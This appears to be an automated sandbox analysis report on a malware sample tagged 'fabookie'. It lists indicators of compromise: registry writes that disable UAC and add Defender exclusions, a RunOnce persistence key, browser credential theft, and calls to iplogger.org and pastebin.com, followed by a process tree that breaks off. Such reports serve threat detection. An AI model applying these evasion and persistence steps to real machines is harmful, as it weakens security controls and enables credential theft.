fabookie | 5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Processes.exe

Windows security bypass 2 TTPs 3 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe = "0"	Processes.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe = "0"	Processes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	Processes.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/files/0x0007000000023c77-1089.dat	Nirsoft
behavioral2/files/0x0007000000023c86-1172.dat	Nirsoft
behavioral2/files/0x0008000000023c86-1259.dat	Nirsoft

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x0007000000023c77-1089.dat	WebBrowserPassView
behavioral2/files/0x0008000000023c86-1259.dat	WebBrowserPassView

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5856	powershell.exe
3276	powershell.exe
5300	powershell.exe
3088	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Process.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Processes.exe

Executes dropped EXE 11 IoCs

pid	Process
4160	Proxypub.exe
2184	Process.exe
1608	Folder.exe
4912	RobCleanerInstlSo22812.exe
3124	askinstall492.exe
3864	Processes.exe
3764	File.exe
1348	Folder.exe
628	Files.exe
5668	11111.exe
5648	11111.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 4 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	Processes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	Processes.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe = "0"	Processes.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe = "0"	Processes.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\zaikais = "C:\\Windows\\Microsoft.NET\\Framework\\mirzas\\svchost.exe"	Processes.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Processes.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Processes.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfhgpjbcoignfibliobpclhpfnadhofn\10.59.13_0\manifest.json	askinstall492.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
19	iplogger.org
20	iplogger.org
33	iplogger.org
34	iplogger.org
107	pastebin.com
108	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3864 set thread context of 4444	3864	Processes.exe	124

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe	Processes.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe	Processes.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5772	4912	WerFault.exe	93

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobCleanerInstlSo22812.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Processes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxypub.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Folder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Folder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	File.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	askinstall492.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11111.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5696	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757844662400187"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
2764	msedge.exe
2764	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
6096	msedge.exe
6096	msedge.exe
5856	powershell.exe
5856	powershell.exe
3276	powershell.exe
3276	powershell.exe
5856	powershell.exe
5300	powershell.exe
5300	powershell.exe
3088	powershell.exe
3088	powershell.exe
3276	powershell.exe
5300	powershell.exe
3088	powershell.exe
3864	Processes.exe
3864	Processes.exe
5648	11111.exe
5648	11111.exe
5648	11111.exe
5648	11111.exe
4016	identity_helper.exe
4016	identity_helper.exe
5228	chrome.exe
5228	chrome.exe
3712	msedge.exe
3712	msedge.exe
3712	msedge.exe
3712	msedge.exe
5684	chrome.exe
5684	chrome.exe
5684	chrome.exe
5684	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4160	Proxypub.exe
Token: SeCreateTokenPrivilege	3124	askinstall492.exe
Token: SeAssignPrimaryTokenPrivilege	3124	askinstall492.exe
Token: SeLockMemoryPrivilege	3124	askinstall492.exe
Token: SeIncreaseQuotaPrivilege	3124	askinstall492.exe
Token: SeMachineAccountPrivilege	3124	askinstall492.exe
Token: SeTcbPrivilege	3124	askinstall492.exe
Token: SeSecurityPrivilege	3124	askinstall492.exe
Token: SeTakeOwnershipPrivilege	3124	askinstall492.exe
Token: SeLoadDriverPrivilege	3124	askinstall492.exe
Token: SeSystemProfilePrivilege	3124	askinstall492.exe
Token: SeSystemtimePrivilege	3124	askinstall492.exe
Token: SeProfSingleProcessPrivilege	3124	askinstall492.exe
Token: SeIncBasePriorityPrivilege	3124	askinstall492.exe
Token: SeCreatePagefilePrivilege	3124	askinstall492.exe
Token: SeCreatePermanentPrivilege	3124	askinstall492.exe
Token: SeBackupPrivilege	3124	askinstall492.exe
Token: SeRestorePrivilege	3124	askinstall492.exe
Token: SeShutdownPrivilege	3124	askinstall492.exe
Token: SeDebugPrivilege	3124	askinstall492.exe
Token: SeAuditPrivilege	3124	askinstall492.exe
Token: SeSystemEnvironmentPrivilege	3124	askinstall492.exe
Token: SeChangeNotifyPrivilege	3124	askinstall492.exe
Token: SeRemoteShutdownPrivilege	3124	askinstall492.exe
Token: SeUndockPrivilege	3124	askinstall492.exe
Token: SeSyncAgentPrivilege	3124	askinstall492.exe
Token: SeEnableDelegationPrivilege	3124	askinstall492.exe
Token: SeManageVolumePrivilege	3124	askinstall492.exe
Token: SeImpersonatePrivilege	3124	askinstall492.exe
Token: SeCreateGlobalPrivilege	3124	askinstall492.exe
Token: 31	3124	askinstall492.exe
Token: 32	3124	askinstall492.exe
Token: 33	3124	askinstall492.exe
Token: 34	3124	askinstall492.exe
Token: 35	3124	askinstall492.exe
Token: SeDebugPrivilege	4912	RobCleanerInstlSo22812.exe
Token: SeDebugPrivilege	5856	powershell.exe
Token: SeDebugPrivilege	3864	Processes.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	5300	powershell.exe
Token: SeDebugPrivilege	3088	powershell.exe
Token: SeDebugPrivilege	5696	taskkill.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe
Token: SeShutdownPrivilege	5228	chrome.exe
Token: SeCreatePagefilePrivilege	5228	chrome.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
3008	msedge.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe
5228	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3764	File.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 4160	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	84
PID 4128 wrote to memory of 4160	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	84
PID 4128 wrote to memory of 4160	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	84
PID 4128 wrote to memory of 3008	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	87
PID 4128 wrote to memory of 3008	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	87
PID 3008 wrote to memory of 4960	3008	msedge.exe	88
PID 3008 wrote to memory of 4960	3008	msedge.exe	88
PID 4128 wrote to memory of 2184	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	89
PID 4128 wrote to memory of 2184	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	89
PID 4128 wrote to memory of 2184	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	89
PID 4128 wrote to memory of 100	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	90
PID 4128 wrote to memory of 100	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	90
PID 100 wrote to memory of 1072	100	msedge.exe	92
PID 100 wrote to memory of 1072	100	msedge.exe	92
PID 4128 wrote to memory of 1608	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	91
PID 4128 wrote to memory of 1608	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	91
PID 4128 wrote to memory of 1608	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	91
PID 4128 wrote to memory of 4912	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	93
PID 4128 wrote to memory of 4912	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	93
PID 4128 wrote to memory of 4912	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	93
PID 4128 wrote to memory of 3124	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	94
PID 4128 wrote to memory of 3124	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	94
PID 4128 wrote to memory of 3124	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	94
PID 2184 wrote to memory of 3864	2184	Process.exe	141
PID 2184 wrote to memory of 3864	2184	Process.exe	141
PID 2184 wrote to memory of 3864	2184	Process.exe	141
PID 4128 wrote to memory of 3764	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	96
PID 4128 wrote to memory of 3764	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	96
PID 4128 wrote to memory of 3764	4128	5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe	96
PID 1608 wrote to memory of 1348	1608	Folder.exe	97
PID 1608 wrote to memory of 1348	1608	Folder.exe	97
PID 1608 wrote to memory of 1348	1608	Folder.exe	97
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100
PID 3008 wrote to memory of 2996	3008	msedge.exe	100

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Processes.exe

C:\Users\Admin\AppData\Local\Temp\5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe
"C:\Users\Admin\AppData\Local\Temp\5c6629c6f9b373d11f3777588c5cd425d7e5ec0990140924047a999a95f218e7.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Users\Admin\AppData\Local\Temp\Proxypub.exe
  "C:\Users\Admin\AppData\Local\Temp\Proxypub.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Btnm7
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdfe2f46f8,0x7ffdfe2f4708,0x7ffdfe2f4718
    3⤵
    PID:4960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
    3⤵
    PID:2996
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
    3⤵
    PID:3696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:4696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:1772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
    3⤵
    PID:5864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
    3⤵
    PID:4064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
    3⤵
    PID:3528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
    3⤵
    PID:2280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
    3⤵
    PID:552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
    3⤵
    PID:5884
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
    3⤵
    PID:2584
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
